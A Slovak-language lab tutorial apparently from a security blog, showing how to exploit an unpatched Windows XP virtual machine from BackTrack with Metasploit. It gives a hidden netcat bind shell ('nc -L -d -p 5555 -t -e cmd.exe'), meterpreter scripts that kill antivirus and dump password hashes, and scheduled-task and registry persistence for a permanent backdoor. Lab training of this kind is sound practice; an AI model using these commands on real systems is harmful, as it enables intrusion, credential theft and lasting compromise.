Tréning dovedností exploitácie operačných systémov – VMware

meterpreter vmware metasploit Na stránkach AMP je niekoľko postupov a zmienok o virtuálnom stoji VMware Workstation ktorý emuluje prostredie a umožňuje inštalovat iné platfromy primo do hotového operačného systému. Šlo zvačša o virtualizáciu operačného systému BackTrack pod operačným systémom Windows. Nový kernel v BackTrack 4 beta resp. Pre-Final (2.6.29.4) dovoľuje po určitých úpravách otočiť tento proces a jednoducho tak testovať / analyzovať proces exploitácie ľubovoľných virtuálnych systémov s použitím VMware verzie 6.5.2.

Výhod je nesporne niekoľko:

– trénovanie a získavanie zručností bez potreby vlastniť viac ako jeden počítač
– reštart virtuálneho systému je otázkou minúty
– ľubovoľný počet virtuálnych operačných systémov

Cieľom tohto cvičenia bude exploitácia zraniteľností operačného systému Windows ,vytvorenie nového procesu v exploitovanom operačnom systéme, migrácia do novovytvoreného procesu, upload netcat.exe + netcat.bat, ukážka práce s meterpreter skriptami a úprava databázy Registry systému Windows za účelom vytvorenia permanentného backdoor-u. Ak by ste toto cvičenie chceli realizovať pod systémom Windows – VMware-emulovaný BackTrack – bude to ako pílenie konára na ktorom sedíte :)

Inštalácia VMware Workstation 6.5.2

sh VMWARE_WORKSTATION_6_5_2.BUNDL

Patch VMware 6.5.2

rmmod kvm_intel kvm
echo blacklist kvm >> /etc/modprobe.d/blacklist
cd /tmp
wget www.offensive-security.com/tools/bt4-vmware-workstation-patch.tar.bz2
tar jxpf bt4-vmware-workstation-patch.tar.bz2
chmod 755 vmware-6.5.2-modules-2.6.29-fix*
./vmware-6.5.2-modules-2.6.29-fix.sh
vmware-modconfig –console –install-all
vmware

Inštalácia viruálneho operačného systému je intuitívna, postačí Iso súbor + licenčný kľúč. (ak inštalujeme OS z rodiny Windows) Po spustení inštalovať VMware Tools.

instalace vmware ve windows xp

Osobne som si zvolil Windows XP Profesional, zľahka bez Service packu s plne aktualizovaným antivírusovým programom Panda Antivirus Pro 2009 a personálnym firewallom FortKnox 2009. Pre študijné učely ideál. Update na Service Pack 3 + skutočný antivírusový program až neskôr, až dozrie čas a vznikne určitý nadhľad.

windows xp vmware start

Exploitácia takéhoto neaktualizovaného operačného systému je záležitosťou troch minút. Antivírusový program a firewall ako keby ani neboli. Rovnako ako v článku Meterpreter keystroke sniffing využijeme Metasploit Framework 3.3 dev konkrétne msfconsole. Vyberieme „správny“ exploit (napr. ms03_026_dcom, ms03_049_netapi, ms06_040_netapi), payload volím obľúbený meterpreter reverse tcp.

ms03 netAPI

Netcat

Netcat je šikovná utilitka slúžiaca pre upload/download súborov,presmerovanie trafficu, banner grabing, port scanning atp. prostredníctvom TCP a UDP protokolu. Casto je označovaný ako „Swiss-army knife for TCP/IP“ Využijeme ho však ako dočasný backdoor, otvárajúci port 5555 na exploitovanom počítači.

1. pomocou payloadu Meterpreter uploadneme nc.exe do adresára c:\\WINDOWS\\system32\\
2. rovnakým spôsobom na rovnaké miesto uplaodneme pripravený súbor nc.bat s obsahom:

nc -L -d -p 5555 -t -e cmd.exe

Vysvetlivky

nc — spusť program nc.exe s nasledovými parametrami:
-L netcat čaká na spojenie
-p špecifikácia portu
-t netcat akceptuje telnet spojenie
-d skrytý režim
-e špecifikácia programu ktorý sa spustí po pripojení na vybraný port (cmd.exe)

Po spustení nc.bat sa otvára port 5555 akceptujúci netcat/telnet spojenia.

temp backdoor

Tieto zadné vrátka sú dočasné a zatvoria sa po reštartovaní cieľového počítača.

Meterpreter scripts

Vývojári payloadu Meterpreter mysleli skutočne na všetko, v skratke prehľad niektorých skriptov:

getcountermeasure.rb – skript vyhľadá antivírusový program inštalovaný v systéme rovnako ako informácie o prítomnom firewalle.

killav – skript sa snaží o kill procesu antivírusového programu, niekedy úspešne, inokedy nie v závislosti od softvéru. Napr. proces srvhost antivírusového programu NOD32 sa reštartuje automaticky po jeho kill-nutí. Viac o obchádzaní tohto procesu možno neskôr. Ide však o vec estetickú, kedže ako bolo popísané v článku meterpreter keystroke sniffing, je možné skryť payload meterpreter v tomto procese príkazom migrate bez najmenších problémov.

keylogrecorder.rb – obdoba keystroke sniffing, samostatne migruje do procesu prehliadača Internet Explorer. Nie príliš štastné miesto z môjho pohľadu, často odstaví spomínaný prehliadač.

meterpreter skripty

winenum – Windows Local Enumerion Meterpreter Script, skript vytvorí detailný report o exploitovamom systéme. Do textového suboru uloží zoznam inštalovaného softvéru, informácie o užívateľských profiloch, procesore, procesoch, netstat info, firewall info, routovacie tabuľky atd. Bonusom sú password hashes.

scheduleme – užitočný skript pre plánovaný/časovaný útok, multifunkčné použitie. (run scheduleme -h)

Permanentný backdoor

1. využijeme skript scheduleme a príkazom

run scheduleme -s -c c:\\WINDOWS\\system32\\nc.bat

zabezpečíme spúštanie súboru nc.bat pri štarte systému.
2. pomocou payloadu meterpreter príkazom reg upravíme Databázu Registry systému Windows čím zabezpečíme spustenie súboru nc.bat

Oba spôsoby otváraju predkonfigurovaný port zvolený v súbore nc.bat rovnako ako v prípade dočasného backdooru. Tretím spôsobom by hádam bolo uploadnuť predpripravený netcat.reg file na cieľový počítač a spustiť. Ďakujem starenke za pomoc s regedit.

meterpreter regedit

VMware má pre korektné fungovanie určité minimálne požiadavky, pri testovaní bol použitý notebook Toshiba A200 1GH (Intel® Core™ Duo T2450,1 GB DDR2 RAM) – operačný sysém BackTrack 4 Pre-Final, 1 GB swap. Vcelku spokojnosť. Pri pokusoch na postaršom počítači s procesorom AMD Sempron 2600+, 768 MB RAM som spozoroval značné obmedzenia zo strany VMware, nezdarila sa ani len migrácia do novovytvoreného procesu virtuálneho OS. Systém však bežal celkom dobre pre bežné činnosti.

diskuze metasploit

Návod na patch VMware 6.5.2 pochádza z webu offensive security.

Pre AMP písal Michal

Kam dál?